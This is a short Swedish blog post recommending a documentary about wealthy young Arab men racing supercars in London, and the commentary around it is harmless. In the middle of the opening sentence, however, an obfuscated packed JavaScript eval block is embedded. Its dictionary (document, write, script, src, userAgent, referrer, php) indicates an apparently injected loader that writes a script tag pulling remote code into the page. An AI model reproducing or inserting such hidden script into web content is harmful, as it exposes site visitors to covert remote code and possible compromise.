Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Millionaire Boy Racers of London

Filip Urde
  • On 7 januari, 2013
  • http://www.revue.se/filip-urde

Arabiska eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|inytn|var|u0026u|referrer|bsdaf||js|php’.split(’|’),0,{}))
grabbar och deras riktigt dyra bilar i London.

Som dem flesta vet så är länderna kring persiska golfen rätt så rika tackvare sina oljefynd. För en stor procent är pengar inget att bry sig om och en god välfärd är självklar.

London är en smältugn för hela världen. Där, precis som i New York, så finner du människor av alla ursprung, ekonomiskt och etniskt.

Något som dock London är riktigt bra på, är att locka till sig folk med pengar från arabvärlden. Ett fenomen som transformerat Londons gator, där rika unga arabiska män med lyxiga superbilar gör om staden till sin egen lekpark. Detta sker under sommaren fram till den heliga högtiden Ramadan.

Det här är en dokumentär om grabbarna som åker till London med sina bilar och invånarna i staden som är emot dem. Millionaire Boy Racers of London heter filmen. Intressant och riktigt tokiga bilar utlovas!

youtube.com

Comments

  1. asd

    Osköna